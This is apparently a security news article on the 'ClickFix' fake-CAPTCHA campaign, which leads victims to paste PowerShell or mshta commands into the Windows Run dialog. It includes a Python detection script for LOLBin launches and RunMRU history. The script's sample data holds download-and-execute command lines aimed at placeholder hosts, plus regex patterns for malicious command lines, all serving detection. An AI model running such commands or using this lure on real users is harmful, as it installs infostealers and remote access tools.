
Example infection chain from CAPTCHA to Lumma Stealer | Image: SentinelOne
Threat actors have ramped up a social engineering campaign, dubbed “ClickFix,” in which fake CAPTCHA prompts embedded in compromised or cloned websites trick users into infecting themselves: the page injects a command into the clipboard and then instructs the victim to paste it into the Windows Run dialog.
In a recent report, SentinelOne reveals how this deceptive technique has evolved over the past year, combining user fatigue with clever use of legitimate Windows tools to execute malicious payloads like Lumma Stealer and NetSupport RAT.
“Victims are socially-engineered into solving a malicious challenge, leading to the execution of PowerShell code followed by additional payloads,” the researchers explain.
The attack starts with a seemingly harmless CAPTCHA prompt that users encounter on a compromised website, fake login portal, phishing email, or even social media link. Victims are guided through a sequence that feels familiar—verify you’re human, solve a puzzle—but ends with something far more sinister.

“Victims are required to solve the CAPTCHA… then paste hidden content from the clipboard into the Windows ‘Run’ dialog,” the report states.
When the victim clicks the fake check, JavaScript on the page silently writes a PowerShell or mshta command to the clipboard. The page then walks the victim through Win+R, Ctrl+V and Enter; once executed, the command contacts a command-and-control server and downloads the next stage. Because the user, not the browser, runs the command, the first stage needs no exploit and no file download.
ClickFix relies heavily on trusted, signed system binaries, the Living Off the Land Binaries (LOLBins), so the first stage is a legitimate Microsoft executable rather than a dropped file that download scanning or application allow-listing would inspect. Attackers typically use tools such as:
- PowerShell – For executing encoded payloads.
- mshta.exe – To load malicious HTA content.
- certutil.exe – To decode or download binaries.
“Certutil.exe is also frequently used in combination with PowerShell commands or scripts,” SentinelOne noted.
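The following is an added example written for this article, not code from SentinelOne or from the report it summarises. It shows the check a defender would want for the mechanism described above: a Run-dialog command is spawned by explorer.exe, so a LOLBin child of explorer.exe whose command line carries download, decode, hidden-window or CAPTCHA-lure text is the detection, and the Run dialog's own history under the RunMRU registry key is the forensic artifact that survives after process telemetry has rolled over. The process events, RunMRU values and indicator regexes are constructed assumptions for illustration (TEST-NET addresses, no real infrastructure).

```python
"""Hunting for ClickFix-style Run-dialog execution.

Added example for this article; it is not SentinelOne's code. The events and
registry values below are constructed, and the indicator list is an assumption
drawn from the behaviour the article describes (LOLBins spawned from the Run
dialog with download/decode/hidden-window arguments).
"""
import re
from dataclasses import dataclass

# First-stage binaries the article lists, plus pwsh for PowerShell 7 hosts
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "certutil.exe"}

# Command-line indicators as (name, regex). Each alone is weak; any hit on a
# LOLBin launched from explorer.exe (the Run dialog's host) is worth a look.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("remote_url", re.compile(r"(?i)\bhttps?://")),
    ("web_download", re.compile(r"(?i)\b(Invoke-WebRequest|iwr|irm|Invoke-RestMethod|DownloadString|Net\.WebClient|curl)\b")),
    ("certutil_fetch_or_decode", re.compile(r"(?i)certutil(\.exe)?.*-(urlcache|decode)")),
    ("mshta_remote", re.compile(r"(?i)mshta(\.exe)?\s+\S*https?://")),
    # ClickFix commands often carry a trailing comment so the Run box shows
    # CAPTCHA-looking text; that comment is itself a strong lure indicator.
    ("captcha_lure_text", re.compile(r"(?i)(I am not a robot|reCAPTCHA|Verification ID)")),
]


@dataclass
class ProcEvent:
    """Minimal Sysmon Event ID 1 / Security 4688-style process-creation record."""
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matched_indicators(command_line: str) -> list:
    return [name for name, rx in INDICATORS if rx.search(command_line)]


def score_event(ev: ProcEvent) -> list:
    """Indicators hit, or [] when the event is not a Run-dialog LOLBin launch.
    Win+R commands are spawned by explorer.exe, hence the parent check; a
    variant pasted into a terminal has a different parent and needs its own rule."""
    if basename(ev.parent_image) != "explorer.exe":
        return []
    if basename(ev.image) not in LOLBINS:
        return []
    return matched_indicators(ev.command_line)


def parse_runmru(values: dict) -> list:
    r"""Run-dialog history, most recent first, from the value set of
    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
    Each lettered value ends in the two characters \1; MRUList holds the
    letters in recency order."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def hunt_runmru(values: dict) -> list:
    """(command, indicators) for every RunMRU entry that hits an indicator."""
    out = []
    for cmd in parse_runmru(values):
        hits = matched_indicators(cmd)
        if hits:
            out.append((cmd, hits))
    return out


# Constructed sample telemetry (RFC 5737 TEST-NET addresses, not real C2)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr http://198.51.100.7/x.txt | iex" '
              '# I am not a robot - reCAPTCHA Verification ID: 4821',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.9/a.hta",
              r"C:\Windows\explorer.exe"),
    # Scheduled task running a script: a LOLBin, but not from the Run dialog
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
              r"C:\Windows\System32\svchost.exe"),
    # Admin typing a harmless command into Win+R: right parent, no indicators
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command Get-Process",
              r"C:\Windows\explorer.exe"),
]

# Constructed RunMRU value set as exported from the victim's user hive
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://198.51.100.7/x.txt | iex"\\1',
}

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        hits = score_event(ev)
        if hits:
            print(f"event {i}: {basename(ev.image)} from Run dialog -> {hits}")
    for cmd, hits in hunt_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU: {cmd!r} -> {hits}")
```

The parent-process check is what keeps the rule quiet on scheduled tasks and admin scripts; the price is that it only covers the Run-dialog path, so a lure that tells the victim to paste into a terminal instead needs a rule keyed on that parent. The RunMRU parser is for the incident-response side: the pasted command stays in the user's hive even when the endpoint has no process telemetry for the day of the click.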
ClickFix campaigns are linked to several notorious malware families:
- Lumma Stealer – An infostealer targeting browser data, credentials, and cryptocurrency wallets.
- NetSupport RAT – A legitimate remote admin tool abused for full system access.
- SectopRAT – A stealthy remote access tool capable of launching a hidden second desktop for browser manipulation.
“The most frequently observed [payloads] have resulted in the download and launch of various infostealer trojans and remote access tools,” the report states.
What sets ClickFix apart is its simplicity. There’s no zero-day exploit, no hidden iframe—just a convincing fake CAPTCHA and a user willing to paste a command into Windows.
“ClickFix relies on user fatigue with anti-spam mechanisms,” SentinelOne warns. “Tricking victims into infecting themselves in this manner has proven highly effective.”